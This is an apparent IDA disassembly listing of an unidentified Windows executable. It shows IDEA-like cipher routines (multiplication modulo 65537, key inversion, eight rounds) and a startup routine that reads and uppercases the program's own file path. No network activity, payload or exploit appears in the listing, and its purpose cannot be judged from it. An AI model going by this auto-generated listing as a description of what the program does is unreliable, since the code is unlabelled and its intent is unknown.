push [ebp+var_94]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_416431
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_98], ax
push [ebp+var_98]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_416431
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
push 1Ah
pop ecx
lea esi, [ebp+var_6C]
mov edi, [ebp+arg_4]
rep movsd
and [ebp+var_78], 0
jmp short loc_41641A
; ---------------------------------------------------------------------------
loc_416413: ; CODE XREF: sub_416130+2F9�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_41641A: ; CODE XREF: sub_416130+2E1�j
cmp [ebp+var_78], 34h
jge short loc_41642B
mov eax, [ebp+var_78]
and [ebp+eax*2+var_6C], 0
jmp short loc_416413
; ---------------------------------------------------------------------------
loc_41642B: ; CODE XREF: sub_416130+2EE�j
pop edi
pop esi
leave
retn 8
sub_416130 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416431 proc near ; CODE XREF: sub_416130+32�p
; sub_416130+81�p ...
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
movzx eax, [ebp+arg_0]
cmp eax, 1
jg short loc_41644C
mov ax, [ebp+arg_0]
jmp locret_416524
; ---------------------------------------------------------------------------
loc_41644C: ; CODE XREF: sub_416431+10�j
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_C], ax
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_41648C
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
jmp locret_416524
; ---------------------------------------------------------------------------
loc_41648C: ; CODE XREF: sub_416431+42�j
mov [ebp+var_8], 1
loc_416492: ; CODE XREF: sub_416431+DF�j
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+arg_0], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_C]
imul eax, ecx
mov cx, [ebp+var_8]
add cx, ax
mov [ebp+var_8], cx
movzx eax, [ebp+arg_0]
cmp eax, 1
jnz short loc_4164D5
mov ax, [ebp+var_8]
jmp short locret_416524
; ---------------------------------------------------------------------------
loc_4164D5: ; CODE XREF: sub_416431+9C�j
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_8]
imul eax, ecx
mov cx, [ebp+var_C]
add cx, ax
mov [ebp+var_C], cx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_416492
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
locret_416524: ; CODE XREF: sub_416431+16�j
; sub_416431+56�j ...
leave
retn 4
sub_416431 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_416544
; ---------------------------------------------------------------------------
loc_41653D: ; CODE XREF: _3:00416566�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_416544: ; CODE XREF: _3:0041653B�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_416568
push dword ptr [ebp-0Ch]
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_41656C
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_41653D
; ---------------------------------------------------------------------------
locret_416568: ; CODE XREF: _3:0041654A�j
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41656C proc near ; CODE XREF: _3:00416558�p _3:00416BCB�p
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_28 = word ptr -28h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1C = word ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 48h
push ebx
mov [ebp+var_30], ecx
mov [ebp+var_4], 8
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_1C], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_20], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_28], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_2C], ax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov [ebp+var_1C], ax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov [ebp+var_20], ax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov [ebp+var_28], ax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov [ebp+var_2C], ax
loc_416613: ; CODE XREF: sub_41656C+41E�j
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4166B2
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_416693
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
jmp short loc_4166A8
; ---------------------------------------------------------------------------
loc_416693: ; CODE XREF: sub_41656C+D8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
loc_4166A8: ; CODE XREF: sub_41656C+125�j
mov ax, [ebp+var_32]
mov [ebp+var_34], ax
jmp short loc_4166C7
; ---------------------------------------------------------------------------
loc_4166B2: ; CODE XREF: sub_41656C+BF�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_34], ax
loc_4166C7: ; CODE XREF: sub_41656C+144�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_416792
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_416773
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
jmp short loc_416788
; ---------------------------------------------------------------------------
loc_416773: ; CODE XREF: sub_41656C+1B8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
loc_416788: ; CODE XREF: sub_41656C+205�j
mov ax, [ebp+var_36]
mov [ebp+var_38], ax
jmp short loc_4167A7
; ---------------------------------------------------------------------------
loc_416792: ; CODE XREF: sub_41656C+19F�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_38], ax
loc_4167A7: ; CODE XREF: sub_41656C+224�j
mov ax, [ebp+var_28]
mov [ebp+var_14], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_1C]
mov [ebp+var_28], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_41685A
movzx eax, [ebp+var_28]
and eax, 0FFFFh
mov [ebp+var_28], ax
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_41683B
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_28], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_28]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_28], ax
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
jmp short loc_416850
; ---------------------------------------------------------------------------
loc_41683B: ; CODE XREF: sub_41656C+280�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
loc_416850: ; CODE XREF: sub_41656C+2CD�j
mov ax, [ebp+var_3A]
mov [ebp+var_3C], ax
jmp short loc_41686F
; ---------------------------------------------------------------------------
loc_41685A: ; CODE XREF: sub_41656C+267�j
movzx eax, [ebp+var_28]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3C], ax
loc_41686F: ; CODE XREF: sub_41656C+2EC�j
mov ax, [ebp+var_20]
mov [ebp+var_C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_2C]
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
add ax, [ebp+var_28]
mov [ebp+var_20], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_41692E
movzx eax, [ebp+var_20]
and eax, 0FFFFh
mov [ebp+var_20], ax
movzx eax, [ebp+var_20]
test eax, eax
jz short loc_41690F
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_20], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_20]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
jmp short loc_416924
; ---------------------------------------------------------------------------
loc_41690F: ; CODE XREF: sub_41656C+354�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
loc_416924: ; CODE XREF: sub_41656C+3A1�j
mov ax, [ebp+var_3E]
mov [ebp+var_40], ax
jmp short loc_416943
; ---------------------------------------------------------------------------
loc_41692E: ; CODE XREF: sub_41656C+33B�j
movzx eax, [ebp+var_20]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_40], ax
loc_416943: ; CODE XREF: sub_41656C+3C0�j
mov ax, [ebp+var_28]
add ax, [ebp+var_20]
mov [ebp+var_28], ax
mov ax, [ebp+var_1C]
xor ax, [ebp+var_20]
mov [ebp+var_1C], ax
mov ax, [ebp+var_2C]
xor ax, [ebp+var_28]
mov [ebp+var_2C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_14]
mov [ebp+var_20], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_C]
mov [ebp+var_28], ax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz loc_416613
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_416A2F
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_416A10
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
jmp short loc_416A25
; ---------------------------------------------------------------------------
loc_416A10: ; CODE XREF: sub_41656C+455�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
loc_416A25: ; CODE XREF: sub_41656C+4A2�j
mov ax, [ebp+var_42]
mov [ebp+var_44], ax
jmp short loc_416A44
; ---------------------------------------------------------------------------
loc_416A2F: ; CODE XREF: sub_41656C+43C�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_44], ax
loc_416A44: ; CODE XREF: sub_41656C+4C1�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
test eax, eax
jz loc_416B07
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_416AE8
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
jmp short loc_416AFD
; ---------------------------------------------------------------------------
loc_416AE8: ; CODE XREF: sub_41656C+52D�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
loc_416AFD: ; CODE XREF: sub_41656C+57A�j
mov ax, [ebp+var_46]
mov [ebp+var_48], ax
jmp short loc_416B1C
; ---------------------------------------------------------------------------
loc_416B07: ; CODE XREF: sub_41656C+514�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_48], ax
loc_416B1C: ; CODE XREF: sub_41656C+599�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
pop ebx
leave
retn 0Ch
sub_41656C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_416BB3
; ---------------------------------------------------------------------------
loc_416BAC: ; CODE XREF: _3:00416BD9�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_416BB3: ; CODE XREF: _3:00416BAA�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_416BDB
mov eax, [ebp-0Ch]
add eax, 68h
push eax
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_41656C
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_416BAC
; ---------------------------------------------------------------------------
locret_416BDB: ; CODE XREF: _3:00416BB9�j
leave
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BE0 proc near ; CODE XREF: sub_41CA0F+1A�p
; sub_41D112+11�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov eax, ds:dword_424870
mov [ebp+var_4], eax
mov ecx, ds:dword_424874
imul ecx, 18h
mov edx, ds:dword_424870
add edx, ecx
mov [ebp+var_8], edx
jmp short loc_416C0F
; ---------------------------------------------------------------------------
loc_416C06: ; CODE XREF: sub_416BE0:loc_416C47�j
mov eax, [ebp+var_4]
add eax, 18h
mov [ebp+var_4], eax
loc_416C0F: ; CODE XREF: sub_416BE0+24�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+var_8]
jz short loc_416C49
mov ecx, 10h
mov edi, [ebp+arg_0]
mov esi, [ebp+var_4]
xor edx, edx
mov [ebp+var_C], edx
repe cmpsb
jz short loc_416C33
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_C], eax
loc_416C33: ; CODE XREF: sub_416BE0+49�j
mov ecx, [ebp+var_C]
mov [ebp+var_10], ecx
cmp [ebp+var_10], 0
jnz short loc_416C47
mov edx, [ebp+var_4]
mov eax, [edx+10h]
jmp short loc_416C4B
; ---------------------------------------------------------------------------
loc_416C47: ; CODE XREF: sub_416BE0+5D�j
jmp short loc_416C06
; ---------------------------------------------------------------------------
loc_416C49: ; CODE XREF: sub_416BE0+35�j
xor eax, eax
loc_416C4B: ; CODE XREF: sub_416BE0+65�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_416BE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C60 proc near ; CODE XREF: sub_418780+D�p
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_1EC = dword ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_16C = byte ptr -16Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041739F SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421400
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_424848
call ds:dword_4246CC ; InitializeCriticalSection
mov [ebp+var_1C], 0
mov [ebp+var_20], 0
mov [ebp+var_24], 0FFFFFFFFh
mov [ebp+var_4], 0
call sub_411E70
and eax, 0FFh
mov ds:dword_423B60, eax
push 104h
call sub_41BA4A
add esp, 4
mov [ebp+var_1A8], eax
mov eax, [ebp+var_1A8]
mov [ebp+var_1C], eax
push 220h
call sub_41BA4A
add esp, 4
mov [ebp+var_1AC], eax
mov ecx, [ebp+var_1AC]
mov [ebp+var_20], ecx
mov ecx, 88h
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 104h
mov edx, [ebp+var_1C]
push edx
push 0
call ds:dword_424698 ; GetModuleHandleA
push eax
call ds:dword_424694 ; GetModuleFileNameA
mov eax, [ebp+var_20]
add eax, 218h
push eax
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
push 104h
mov edx, [ebp+var_1C]
push edx
call ds:dword_424688 ; GetFullPathNameA
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_424748 ; CharUpperBuffA
mov ecx, [ebp+var_20]
add ecx, 10h
mov edx, [ebp+var_20]
mov eax, [edx+218h]
sub eax, ecx
mov ecx, [ebp+var_20]
mov [ecx+21Ch], eax
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_2C], ecx
mov edx, [ebp+var_2C]
add edx, 1
push edx
call sub_41BA4A
add esp, 4
mov [ebp+var_1B0], eax
mov eax, [ebp+var_1B0]
mov ds:dword_42488C, eax
mov ecx, [ebp+var_20]
add ecx, 10h
mov edi, ecx
mov edx, ds:dword_42488C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, ds:dword_424604
mov edx, [ecx+24h]
and edx, 2
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_28], dl
mov eax, [ebp+var_28]
and eax, 0FFh
test eax, eax
jz loc_416EAD
mov ecx, ds:dword_424604
mov edx, [ecx+2Ch]
add edx, 30h
mov [ebp+var_38], edx
mov edi, [ebp+var_38]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_34], ecx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_4105C0
add esp, 8
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jnz short loc_416E50
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov edx, [ebp+var_20]
lea eax, [edx+ecx+10h]
mov [ebp+var_30], eax
loc_416E50: ; CODE XREF: sub_416C60+1D2�j
mov ecx, [ebp+var_20]
add ecx, 10h
mov edx, [ebp+var_30]
sub edx, ecx
add edx, [ebp+var_34]
cmp edx, 104h
jb short loc_416E70
mov ecx, 0EF000004h
call sub_41BA32
loc_416E70: ; CODE XREF: sub_416C60+204�j
mov ecx, [ebp+var_34]
add ecx, 1
mov esi, [ebp+var_38]
mov edi, [ebp+var_30]
add edi, 1
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_424748 ; CharUpperBuffA
loc_416EAD: ; CODE XREF: sub_416C60+193�j
mov edx, [ebp+var_20]
mov dword ptr [edx], 0
mov eax, [ebp+var_20]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_20]
mov ds:dword_424888, ecx
mov edx, ds:dword_424604
mov eax, [edx+24h]
and eax, 1
test eax, eax
jz short loc_416EEC
push 1
push 1
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call loc_4173B0
add esp, 0Ch
loc_416EEC: ; CODE XREF: sub_416C60+277�j
push 105h
call sub_41BA4A
add esp, 4
mov [ebp+var_1B4], eax
mov edx, [ebp+var_1B4]
mov [ebp+var_40], edx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_4105C0
add esp, 8
add eax, 1
mov [ebp+var_4C], eax
mov [ebp+var_44], 0
mov ecx, ds:dword_424604
mov edx, [ecx+2Ch]
add edx, 71h
mov [ebp+var_48], edx
mov edi, [ebp+var_48]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, [ebp+var_48]
add eax, ecx
mov [ebp+var_3C], eax
mov ecx, [ebp+var_48]
cmp ecx, [ebp+var_3C]
jz loc_417187
mov [ebp+var_44], 1
mov edx, [ebp+var_48]
mov [ebp+var_19C], edx
jmp short loc_416F79
; ---------------------------------------------------------------------------
